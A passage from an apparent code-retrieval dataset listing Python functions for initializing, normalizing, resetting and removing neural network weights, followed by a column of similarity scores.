self.inv_covariance_mat = np.zeros((self.k, self.layer1_size, self.layer1_size), dtype=np.float32)\n self.pi = np.zeros((self.vocab_size, self.k), dtype=np.float32)", "def remove_weights(self):\n cdef StdVectorFst result = StdVectorFst(isyms=self.isyms, osyms=self.osyms)\n openfst.ArcMap(self.fst[0], result.fst, openfst.RmTropicalWeightMapper())\n return result", "def turn_intensity_normalization_off(self):\n self.intensity_normalize_image = False", "def module_cleanup():\n from bokeh.core.has_props import _default_resolver\n to_reset = 
list(panel_extension._imports.values())\n\n _default_resolver._known_models = {\n name: model for name, model in _default_resolver._known_models.items()\n if not any(model.__module__.startswith(tr) for tr in to_reset)\n }", "def reset(self):\n weight = self.module.weight.data\n self.sensitivity_in = torch.zeros(weight.shape[1]).to(weight.device)\n self._features = torch.Tensor()\n self._current_batch = 1", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def reset_pooling_layer(self):\n self._semantic_decoder.reset_pooling_layer()\n if self._instance_decoder is not None:\n self._instance_decoder.reset_pooling_layer()", "def reset_pooling_layer(self):\n self._aspp.reset_pooling_layer()", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def reset_parameters(self):\n if self.W is not None:\n tanh_gain = weight_init.calculate_gain(\"tanh\")\n weight_init.xavier_normal_(self.W, tanh_gain)\n # self.W.data.uniform_(-0.001, 0.001)", "def modify_weights_after_load(model):\n # Prune heads if needed\n if model.config.pruned_heads:\n model.prune_heads(model.config.pruned_heads)\n\n # Tie weights if needed\n model.tie_weights()", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n 
if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def set_weights_without_biases(self, weights, layer_number):\r\n self.weights[layer_number] = weights", "def _cleanup(self):\n\n self.netIns = []\n self.netOuts = []\n self.Gradients = [None]*self.size", "def _init_weights(layer):\n if isinstance(layer, (nn.Conv2d, nn.Linear)):\n torch.nn.init.xavier_uniform_(layer.weight)\n try:\n # Some layers may not have biases, so catch the exception and pass.\n layer.bias.data.fill_(0.0)\n except AttributeError:\n pass", "def reset(self):\n\n def reset_function(module):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n m.reset_parameters()\n\n self.apply(reset_function)", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def reset_parameters(self) -> None:\n std = math.sqrt(3 / self.in_features)\n self.weight.data.uniform_(-std, std)\n self.bias.data.uniform_(-std, std)", "def applyMorphologicalCleaning(self, image):", "def test_permute_W_no_model(self):\n\t\tN, M = 4096, 4096\n\t\titerator = self.watcher.make_layer_iterator(model=self.model, layers=[self.fc2_layer])\n\t\tfor ww_layer in iterator:\n\t\t\tself.assertEqual(ww_layer.layer_id,self.fc2_layer)\n\t\t\tW = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W.shape,(N,M))\n\t\t\t\n\t\t\tself.watcher.apply_permute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertNotEqual(W[0,0],W2[0,0])\n\t\t\t\n\t\t\tself.watcher.apply_unpermute_W(ww_layer)\n\t\t\tW2 = ww_layer.Wmats[0]\n\t\t\tself.assertEqual(W2.shape,(N,M))\n\t\t\tself.assertEqual(W[0,0],W2[0,0])", "def reset_layer(self):\n if self.W is None:\n if self.sparse_initialize:\n W_values = self.sparse_initialize_weights()\n else:\n if self.activation == theano.tensor.tanh:\n born = np.sqrt(6. / (self.n_in + self.n_out))\n else:\n born = 4 * np.sqrt(6. 
/ (self.n_in + self.n_out))\n W_values = np.asarray(self.rng.uniform(\n low=-born,\n high=born,\n size=(self.n_in, self.n_out)),\n dtype=theano.config.floatX)\n\n self.W = theano.shared(value=W_values, name='W', borrow=True)\n\n if self.b is None:\n b_values = np.zeros(int(self.n_out/self.num_pieces),\n dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, name='b', borrow=True)\n\n if self.sparser is None:\n s_values = np.ones(\n int(self.n_out/self.num_pieces), dtype=theano.config.floatX)\n self.sparser = theano.shared(value=s_values, name='sparser',\n borrow=True)\n # The layer parameters\n self.params = [self.W, self.b]", "def RemoveWeights(frame, zero_nans=False):\n if \"Wpol\" not in frame and \"Wunpol\" not in frame:\n return\n\n if not frame[\"T\"].weighted:\n return frame\n ValidateMaps(frame)\n\n tmap = frame.pop(\"T\")\n\n if \"Wpol\" in frame:\n wmap = frame[\"Wpol\"]\n qmap = frame.pop(\"Q\")\n umap = frame.pop(\"U\")\n maps.remove_weights(tmap, qmap, umap, wmap, zero_nans=zero_nans)\n else:\n wmap = frame[\"Wunpol\"]\n maps.remove_weights_t(tmap, wmap, zero_nans=zero_nans)\n\n frame[\"T\"] = tmap\n if \"Wpol\" in frame:\n frame[\"Q\"] = qmap\n frame[\"U\"] = umap\n\n return frame", "def reset_parameters(self):\n\n for layer in self.layers:\n layer.reset_parameters()", "def _untrain(self):\n if not self.trained:\n return\n for clf in self.clfs:\n clf.untrain()\n super(BoostedClassifier, self)._untrain()", "def init_weights(module, negative_slope=0):\n if isinstance(module, (nn.Conv2d, nn.ConvTranspose2d)):\n nn.init.kaiming_normal_(module.weight.data, negative_slope)\n module.bias.data.zero_()", "def remove_blurring(self):\n self._render_passes.remove_blur_pass()", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def reset_layers(self, rov_id): # Clear hidden layers and output layers\n for i in range(self.n_nodes):\n self.hid_layer[rov_id, i] = 0.0\n\n for j in range(self.n_outputs):\n self.out_layer[rov_id, j] = 0.0", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module" ]
[ "0.79998016", "0.76628864", "0.7629923", "0.72848314", "0.7045166", "0.67848754", "0.6780856", "0.6746634", "0.6591088", "0.65823525", "0.6566755", "0.65617", "0.65572643", "0.65561306", "0.6538293", "0.6538293", "0.6538293", "0.6529808", "0.6526071", "0.651576", "0.64801204", "0.6455137", "0.64305204", "0.642898", "0.6405197", "0.6397573", "0.63855386", "0.6293032", "0.6251394", "0.6249921", "0.6233528", "0.6218253", "0.62125546", "0.6161037", "0.6131475", "0.61087567", "0.60970056", "0.6089598", "0.60496736", "0.60437787", "0.60437787", "0.60437787", "0.6040404", "0.60095733", "0.59844965", "0.5978158", "0.597737", "0.5969688", "0.5968303", "0.5965113", "0.5965113", "0.5962245", "0.59447", "0.5936001", "0.5907403", "0.59055173", "0.5901809", "0.5892338", "0.58894366", "0.58894366", "0.5871337", "0.5862168", "0.58555585", "0.5836302", "0.58316904", "0.5826069", "0.5822462", "0.5818256", "0.5817126", "0.5813045", "0.5796031", "0.5795884", "0.57813996", "0.57679164", "0.57545006", "0.57498974", "0.5747443", "0.57424116", "0.57346195", "0.5728497", "0.57271147", "0.5710471", "0.5693999", "0.5684778", "0.56757396", "0.5671626", "0.5663894", "0.5649495", "0.5648036", "0.56285703", "0.5622598", "0.5621248", "0.5614808", "0.5613118", "0.5610067", "0.55977714", "0.5596888", "0.55955064", "0.5567413" ]
0.7893102
2
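Aside (editorial illustration, not a dataset row): a minimal, self-contained sketch of how the apply/remove weight-norm pattern in the record above is typically used in PyTorch. The TinyGenerator module, its layer sizes, and the input shape are invented for this example; only the torch.nn.utils.weight_norm / remove_weight_norm calls mirror the record.
import torch


class TinyGenerator(torch.nn.Module):
    """Toy module used only to demonstrate the apply/remove weight-norm pattern."""

    def __init__(self):
        super().__init__()
        self.conv1 = torch.nn.Conv1d(1, 8, kernel_size=3, padding=1)
        self.conv2 = torch.nn.Conv1d(8, 1, kernel_size=3, padding=1)

    def forward(self, x):
        return self.conv2(torch.relu(self.conv1(x)))

    def apply_weight_norm(self):
        # Wrap every Conv1d / ConvTranspose1d weight with weight normalization.
        def _apply(m):
            if isinstance(m, (torch.nn.Conv1d, torch.nn.ConvTranspose1d)):
                torch.nn.utils.weight_norm(m)

        self.apply(_apply)

    def remove_weight_norm(self):
        # Fold the weight-norm reparametrization back into a plain weight tensor,
        # e.g. before exporting the trained model for inference.
        def _remove(m):
            try:
                torch.nn.utils.remove_weight_norm(m)
            except ValueError:  # module had no weight norm attached
                pass

        self.apply(_remove)


model = TinyGenerator()
model.apply_weight_norm()    # train with weight-normalized convolutions
model.remove_weight_norm()   # strip the reparametrization afterwards
print(model(torch.randn(1, 1, 16)).shape)  # -> torch.Size([1, 1, 16])
Weight norm reparametrizes each weight as g * v / ||v||; removing it collapses the two parameters back into a single tensor so inference carries no extra overhead.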
Apply weight normalization module from all of the layers.
def apply_weight_norm(self):
    def _apply_weight_norm(m):
        if isinstance(m, torch.nn.Conv1d) or isinstance(
            m, torch.nn.ConvTranspose1d
        ):
            torch.nn.utils.weight_norm(m)
            logging.debug(f"Weight norm is applied to {m}.")

    self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not 
None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n 
p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def init_weights(self):\n 
for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def apply_on_layer(self, layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def 
normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - 
